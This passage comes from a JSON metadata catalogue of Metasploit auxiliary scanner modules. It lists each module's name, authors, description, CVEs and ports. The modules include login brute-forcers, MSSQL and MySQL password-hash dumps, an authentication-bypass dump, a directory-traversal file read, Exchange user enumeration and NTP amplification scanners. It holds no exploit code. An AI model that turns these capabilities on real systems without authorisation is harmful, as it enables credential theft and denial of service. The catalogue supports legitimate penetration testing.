"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb",
"is_install_path": true,
"ref_name": "scanner/misc/sunrpc_portmapper",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/zenworks_preboot_fileaccess": {
"name": "Novell ZENworks Configuration Management Preboot Service Remote File Access",
"full_name": "auxiliary/scanner/misc/zenworks_preboot_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal in the ZENworks Configuration Management.\n The vulnerability exists in the Preboot service and can be triggered by sending a specially\n crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This module has been\n successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.",
"references": [
"CVE-2012-2215",
"OSVDB-80230",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975"
],
"platform": "",
"arch": "",
"rport": 998,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/misc/zenworks_preboot_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mongodb/mongodb_login": {
"name": "MongoDB Login Utility",
"full_name": "auxiliary/scanner/mongodb/mongodb_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man <man.gregory@gmail.com>"
],
"description": "This module attempts to brute force authentication credentials for MongoDB.\n Note that, by default, MongoDB does not require authentication.",
"references": [
"URL-http://www.mongodb.org/display/DOCS/Mongo+Wire+Protocol",
"URL-http://www.mongodb.org/display/DOCS/Implementing+Authentication+in+a+Driver"
],
"platform": "",
"arch": "",
"rport": 27017,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/mongodb/mongodb_login.rb",
"is_install_path": true,
"ref_name": "scanner/mongodb/mongodb_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/motorola/timbuktu_udp": {
"name": "Motorola Timbuktu Service Detection",
"full_name": "auxiliary/scanner/motorola/timbuktu_udp",
"rank": 300,
"disclosure_date": "2009-09-25",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply sends a packet to the Motorola Timbuktu service for detection.",
"references": [
],
"platform": "",
"arch": "",
"rport": 407,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/motorola/timbuktu_udp.rb",
"is_install_path": true,
"ref_name": "scanner/motorola/timbuktu_udp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mqtt/connect": {
"name": "MQTT Authentication Scanner",
"full_name": "auxiliary/scanner/mqtt/connect",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module attempts to authenticate to MQTT.",
"references": [
"URL-http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html#_Table_3.1_-"
],
"platform": "",
"arch": "",
"rport": 1883,
"autofilter_ports": [
1883,
8883
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-12-20 18:44:43 +0000",
"path": "/modules/auxiliary/scanner/mqtt/connect.rb",
"is_install_path": true,
"ref_name": "scanner/mqtt/connect",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/msf/msf_rpc_login": {
"name": "Metasploit RPC Interface Login Utility",
"full_name": "auxiliary/scanner/msf/msf_rpc_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to log in to a\n Metasploit RPC interface using a specific\n user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 55553,
"autofilter_ports": [
3790
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-14 06:34:04 +0000",
"path": "/modules/auxiliary/scanner/msf/msf_rpc_login.rb",
"is_install_path": true,
"ref_name": "scanner/msf/msf_rpc_login",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/msf/msf_web_login": {
"name": "Metasploit Web Interface Login Utility",
"full_name": "auxiliary/scanner/msf/msf_web_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to log in to a Metasploit\n web interface using a specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3790,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
55553
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/msf/msf_web_login.rb",
"is_install_path": true,
"ref_name": "scanner/msf/msf_web_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/msmail/exchange_enum": {
"name": "Exchange email enumeration",
"full_name": "auxiliary/scanner/msmail/exchange_enum",
"rank": 300,
"disclosure_date": "2018-11-06",
"type": "auxiliary",
"author": [
"poptart",
"jlarose",
"Vincent Yiu",
"grimhacker",
"Nate Power",
"Nick Powers",
"clee-r7"
],
"description": "Error-based user enumeration for Office 365 integrated email addresses",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-07 13:29:56 +0000",
"path": "/modules/auxiliary/scanner/msmail/exchange_enum.go",
"is_install_path": true,
"ref_name": "scanner/msmail/exchange_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/msmail/host_id": {
"name": "Vulnerable domain identification",
"full_name": "auxiliary/scanner/msmail/host_id",
"rank": 300,
"disclosure_date": "2018-11-06",
"type": "auxiliary",
"author": [
"poptart",
"jlarose",
"Vincent Yiu",
"grimhacker",
"Nate Power",
"Nick Powers",
"clee-r7"
],
"description": "Identifying potentially vulnerable Exchange endpoints",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-07 13:29:56 +0000",
"path": "/modules/auxiliary/scanner/msmail/host_id.go",
"is_install_path": true,
"ref_name": "scanner/msmail/host_id",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/msmail/onprem_enum": {
"name": "On premise user enumeration",
"full_name": "auxiliary/scanner/msmail/onprem_enum",
"rank": 300,
"disclosure_date": "2018-11-06",
"type": "auxiliary",
"author": [
"poptart",
"jlarose",
"Vincent Yiu",
"grimhacker",
"Nate Power",
"Nick Powers",
"clee-r7"
],
"description": "On-premises enumeration of valid Exchange users",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-07 13:29:56 +0000",
"path": "/modules/auxiliary/scanner/msmail/onprem_enum.go",
"is_install_path": true,
"ref_name": "scanner/msmail/onprem_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mssql/mssql_hashdump": {
"name": "MSSQL Password Hashdump",
"full_name": "auxiliary/scanner/mssql/mssql_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts the usernames and encrypted password\n hashes from an MSSQL server and stores them for later cracking.\n This module also saves information about the server version and\n table names, which can be used to seed the wordlist.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/mssql/mssql_hashdump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mssql/mssql_login": {
"name": "MSSQL Login Utility",
"full_name": "auxiliary/scanner/mssql/mssql_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).",
"references": [
"CVE-1999-0506"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
"is_install_path": true,
"ref_name": "scanner/mssql/mssql_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mssql/mssql_ping": {
"name": "MSSQL Ping Utility",
"full_name": "auxiliary/scanner/mssql/mssql_ping",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply queries the MSSQL instance for information.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
"is_install_path": true,
"ref_name": "scanner/mssql/mssql_ping",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mssql/mssql_schemadump": {
"name": "MSSQL Schema Dump",
"full_name": "auxiliary/scanner/mssql/mssql_schemadump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to extract the schema from an MSSQL Server\n instance. It will disregard built-in and example DBs such\n as master, model, msdb, and tempdb. The module will create\n a note for each DB found, and store a YAML-formatted output\n as loot for easy reading.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-08-31 14:08:27 +0000",
"path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
"is_install_path": true,
"ref_name": "scanner/mssql/mssql_schemadump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_authbypass_hashdump": {
"name": "MySQL Authentication Bypass Password Dump",
"full_name": "auxiliary/scanner/mysql/mysql_authbypass_hashdump",
"rank": 300,
"disclosure_date": "2012-06-09",
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"jcran <jcran@metasploit.com>"
],
"description": "This module exploits a password bypass vulnerability in MySQL in order\n to extract the usernames and encrypted password hashes from a MySQL server.\n These hashes are stored as loot for later cracking.",
"references": [
"CVE-2012-2122",
"OSVDB-82804",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql"
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_authbypass_hashdump",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_file_enum": {
"name": "MYSQL File/Directory Enumerator",
"full_name": "auxiliary/scanner/mysql/mysql_file_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Robin Wood <robin@digininja.org>"
],
"description": "Enumerate files and directories using the MySQL load_file feature; for more\n information see the URL in the references.",
"references": [
"URL-http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html",
"URL-http://www.digininja.org/projects/mysql_file_enum.php"
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_file_enum",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_hashdump": {
"name": "MYSQL Password Hashdump",
"full_name": "auxiliary/scanner/mysql/mysql_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts the usernames and encrypted password\n hashes from a MySQL server and stores them for later cracking.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-02-08 13:48:24 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_hashdump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_login": {
"name": "MySQL Login Utility",
"full_name": "auxiliary/scanner/mysql/mysql_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Bernardo Damele A. G. <bernardo.damele@gmail.com>"
],
"description": "This module simply queries the MySQL instance for a specific user/pass (default is root with blank).",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_schemadump": {
"name": "MYSQL Schema Dump",
"full_name": "auxiliary/scanner/mysql/mysql_schemadump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts the schema information from a\n MySQL DB server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_schemadump.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_schemadump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_version": {
"name": "MySQL Server Version Enumeration",
"full_name": "auxiliary/scanner/mysql/mysql_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Enumerates the version of MySQL servers.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_version.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_writable_dirs": {
"name": "MYSQL Directory Write Test",
"full_name": "auxiliary/scanner/mysql/mysql_writable_dirs",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"AverageSecurityGuy <stephen@averagesecurityguy.info>"
],
"description": "Enumerate writable directories using the MySQL SELECT INTO DUMPFILE feature; for more\n information see the URL in the references. ***Note: For every writable directory found,\n a file with the specified FILE_NAME containing the text \"test\" will be written to the directory.***",
"references": [
"URL-https://dev.mysql.com/doc/refman/5.7/en/select-into.html"
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_writable_dirs",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/natpmp/natpmp_portscan": {
"name": "NAT-PMP External Port Scanner",
"full_name": "auxiliary/scanner/natpmp/natpmp_portscan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Scan NAT devices for their external listening ports using NAT-PMP",
"references": [
],
"platform": "",
"arch": "",
"rport": 5351,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb",
"is_install_path": true,
"ref_name": "scanner/natpmp/natpmp_portscan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nessus/nessus_ntp_login": {
"name": "Nessus NTP Login Utility",
"full_name": "auxiliary/scanner/nessus/nessus_ntp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module attempts to authenticate to a Nessus NTP service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1241,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-20 21:25:34 +0000",
"path": "/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb",
"is_install_path": true,
"ref_name": "scanner/nessus/nessus_ntp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nessus/nessus_rest_login": {
"name": "Nessus RPC Interface Login Utility",
"full_name": "auxiliary/scanner/nessus/nessus_rest_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"void_in"
],
"description": "This module will attempt to authenticate to a Nessus server RPC interface.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8834,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-14 11:16:41 +0000",
"path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb",
"is_install_path": true,
"ref_name": "scanner/nessus/nessus_rest_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nessus/nessus_xmlrpc_login": {
"name": "Nessus XMLRPC Interface Login Utility",
"full_name": "auxiliary/scanner/nessus/nessus_xmlrpc_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to login to a Nessus XMLRPC interface using a\n specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8834,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb",
"is_install_path": true,
"ref_name": "scanner/nessus/nessus_xmlrpc_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nessus/nessus_xmlrpc_ping": {
"name": "Nessus XMLRPC Interface Ping Utility",
"full_name": "auxiliary/scanner/nessus/nessus_xmlrpc_ping",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to find and check\n for a Nessus XMLRPC interface.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8834,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb",
"is_install_path": true,
"ref_name": "scanner/nessus/nessus_xmlrpc_ping",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/netbios/nbname": {
"name": "NetBIOS Information Discovery",
"full_name": "auxiliary/scanner/netbios/nbname",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Discover host information through NetBIOS",
"references": [
],
"platform": "",
"arch": "",
"rport": 137,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/netbios/nbname.rb",
"is_install_path": true,
"ref_name": "scanner/netbios/nbname",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nexpose/nexpose_api_login": {
"name": "NeXpose API Interface Login Utility",
"full_name": "auxiliary/scanner/nexpose/nexpose_api_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to login to a NeXpose API interface using a\n specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3780,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb",
"is_install_path": true,
"ref_name": "scanner/nexpose/nexpose_api_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nfs/nfsmount": {
"name": "NFS Mount Scanner",
"full_name": "auxiliary/scanner/nfs/nfsmount",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module scans NFS mounts and their permissions.",
"references": [
"CVE-1999-0170",
"URL-http://www.ietf.org/rfc/rfc1094.txt"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/nfs/nfsmount.rb",
"is_install_path": true,
"ref_name": "scanner/nfs/nfsmount",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nntp/nntp_login": {
"name": "NNTP Login Utility",
"full_name": "auxiliary/scanner/nntp/nntp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to authenticate to NNTP services\n which support the AUTHINFO authentication extension.\n\n This module supports AUTHINFO USER/PASS authentication,\n but does not support AUTHINFO GENERIC or AUTHINFO SASL\n authentication methods.",
"references": [
"CVE-1999-0502",
"URL-https://tools.ietf.org/html/rfc3977",
"URL-https://tools.ietf.org/html/rfc4642",
"URL-https://tools.ietf.org/html/rfc4643"
],
"platform": "",
"arch": "",
"rport": 119,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/nntp/nntp_login.rb",
"is_install_path": true,
"ref_name": "scanner/nntp/nntp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_monlist": {
"name": "NTP Monitor List Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_monlist",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module identifies NTP servers which permit \"monlist\" queries and\n obtains the recent clients list. The monlist feature allows remote\n attackers to cause a denial of service (traffic amplification)\n via spoofed requests. The more clients there are in the list, the\n greater the amplification.",
"references": [
"CVE-2013-5211",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-013A",
"URL-http://support.ntp.org/bin/view/Main/SecurityNotice",
"URL-http://nmap.org/nsedoc/scripts/ntp-monlist.html"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_monlist.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_monlist",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_nak_to_the_future": {
"name": "NTP \"NAK to the Future\"",
"full_name": "auxiliary/scanner/ntp/ntp_nak_to_the_future",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matthew Van Gundy of Cisco ASIG",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Crypto-NAK packets can be used to cause ntpd to accept time from\n unauthenticated ephemeral symmetric peers by bypassing the\n authentication required to mobilize peer associations. This module\n sends these Crypto-NAK packets in order to establish an association\n between the target ntpd instance and the attacking client. The end goal\n is to cause ntpd to declare the legitimate peers \"false tickers\" and\n choose the attacking clients as the preferred peers, allowing\n these peers to control time.",
"references": [
"URL-http://talosintel.com/reports/TALOS-2015-0069/",
"URL-http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html",
"URL-http://support.ntp.org/bin/view/Main/NtpBug2941",
"CVE-2015-7871"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_nak_to_the_future",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_peer_list_dos": {
"name": "NTP Mode 7 PEER_LIST DoS Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_peer_list_dos",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module identifies NTP servers which permit \"PEER_LIST\" queries and\n return responses that are larger in size or greater in quantity than\n the request, allowing remote attackers to cause a distributed, reflected\n denial of service (aka, \"DRDoS\" or traffic amplification) via spoofed\n requests.",
"references": [
"CVE-2013-5211",
"URL-https://github.com/rapid7/metasploit-framework/pull/3696",
"URL-http://r-7.co/R7-2014-12"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_peer_list_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_peer_list_sum_dos": {
"name": "NTP Mode 7 PEER_LIST_SUM DoS Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_peer_list_sum_dos",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module identifies NTP servers which permit \"PEER_LIST_SUM\" queries and\n return responses that are larger in size or greater in quantity than\n the request, allowing remote attackers to cause a distributed, reflected\n denial of service (aka, \"DRDoS\" or traffic amplification) via spoofed\n requests.",
"references": [
"CVE-2013-5211",
"URL-https://github.com/rapid7/metasploit-framework/pull/3696",
"URL-http://r-7.co/R7-2014-12"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_peer_list_sum_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_readvar": {
"name": "NTP Clock Variables Disclosure",
"full_name": "auxiliary/scanner/ntp/ntp_readvar",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ewerson Guimaraes(Crash) <crash@dclabs.com.br>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module reads the system internal NTP variables. These variables contain\n potentially sensitive information, such as the NTP software version, operating\n system version, peers, and more.",
"references": [
"CVE-2013-5211",
"URL-http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_readvar.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_readvar",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_req_nonce_dos": {
"name": "NTP Mode 6 REQ_NONCE DRDoS Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_req_nonce_dos",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module identifies NTP servers which permit mode 6 REQ_NONCE requests that\n can be used to conduct DRDoS attacks. In some configurations, NTP servers will\n respond to REQ_NONCE requests with a response larger than the request,\n allowing remote attackers to cause a distributed, reflected\n denial of service (aka, \"DRDoS\" or traffic amplification) via spoofed\n requests.",
"references": [
"CVE-2013-5211",
